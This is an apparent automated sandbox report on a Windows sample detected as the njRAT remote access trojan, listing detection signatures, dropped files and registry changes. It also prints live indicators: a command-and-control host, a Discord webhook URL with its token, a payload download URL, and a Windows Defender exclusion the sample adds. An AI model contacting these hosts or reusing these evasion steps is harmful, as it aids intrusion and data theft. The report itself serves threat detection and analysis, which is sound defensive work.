Windows Analysis Report
virus.exe.bin.exe

Overview

General Information

Sample name:	virus.exe.bin.exe
Analysis ID:	1645584
MD5:	b7ba3e0d0b59d704526b7ba31af583dc
SHA1:	9b69ae0cd6c19534e468f0c3616af680dd887445
SHA256:	69398832076d266d4a8fc08d36e150d39d976ea93e3bc03af2e1584107d8f815
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

Njrat

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious encrypted Powershell command line found

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Njrat

.NET source code contains a sample name check

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Adds extensions / path to Windows Defender exclusion list (Registry)

Contains functionality to log keystrokes (.Net Source)

Creates autostart registry keys with suspicious names

Disables zone checking for all users

Drops PE files to the startup folder

Encrypted powershell cmdline option found

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Potential dropper URLs found in powershell memory

Protects its processes via BreakOnTermination flag

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Dllhost Internet Connection

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Windows Defender Exclusions Added - Registry

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
NjRAT	RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.	AQUATIC PANDA Earth Lusca Operation C-Major The Gorgon Group	http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/ http://blogs.360.cn/post/analysis-of-apt-c-37.html http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://asec.ahnlab.com/1369	https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: virus.exe.bin.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\ClickMe.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 11.2.final.exe.3758448.0.raw.unpack

Malware Configuration Extractor: Njrat {"Host": "gabh.gotdns.ch", "Port": "7777", "Version": "<- NjRAT 0.7d Horror Edition ->", "Registry Name": "c382eb151c59bd833b24120723eac541", "Campaign ID": "User", "Network Seprator": "Y262SUCZ4UJJ"}

Multi AV Scanner detection for dropped file

Source: C:\ClickMe.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\dllhost.exe	ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: virus.exe.bin.exe	ReversingLabs: Detection: 66%
Source: virus.exe.bin.exe	Virustotal: Detection: 65%			Perma Link

Yara detected Njrat

Source: Yara match	File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.6:49685 version: TLS 1.2

Source: virus.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 Corporation1)0' source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Daniel\source\repos\joinerStub\obj\Release\joinerStub.pdb source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, virus.exe.bin.exe, 00000000.00000000.1431169171.0000000000E32000.00000002.00000001.01000000.00000003.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Daniel\program.pdb source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths C:\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		16_2_079BB248
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		16_2_079BB238

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.6:49691 -> 46.121.250.34:7777
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.6:49691 -> 46.121.250.34:7777
Source: Network traffic	Suricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.6:49691 -> 46.121.250.34:7777

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Network Connect: 46.121.250.34 7777

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp

String found in memory: <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-74231a1f3bbb.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-8a995f0bacd4.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-f37fb7684b1f.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-9ac301c3ebe5.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-cd826e8636dc.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-f91b0f603451.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-83beb16e0ecf.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-6e122dab64fc.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-18119e682df0.css" />

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49691 -> 46.121.250.34:7777

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9 HTTP/1.1Content-Type: application/jsonHost: discordapp.comContent-Length: 80Expect: 100-continueConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 140.82.113.3 140.82.113.3
Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49683 -> 172.67.74.152:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49685 -> 140.82.113.3:443

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: discordapp.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: gabh.gotdns.ch

Source: unknown

HTTP traffic detected: POST /api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9 HTTP/1.1Content-Type: application/jsonHost: discordapp.comContent-Length: 80Expect: 100-continueConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Fri, 21 Mar 2025 22:09:50 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin

Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/U3
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errorLastChi=
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decln
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-declna
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsme
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsNodeVal;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/include-comments
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesling
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyy/
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growthh
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespaces
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespacesA
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdte:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsf-node7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refst3
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotationsce
Source: javaw.exe, 0000000C.00000002.3918752239.0000000014F9C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2692372832.0000000014F95000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treeskN1
Source: javaw.exe, 0000000C.00000002.3918752239.0000000014F9C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2692372832.0000000014F95000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/dynamicrnal/im
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/xml/F
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkingum
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingor=
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvispa
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclnA
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueang/IllB
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingva/lanB
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefutil/SD
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefniti:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/w3c/d
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
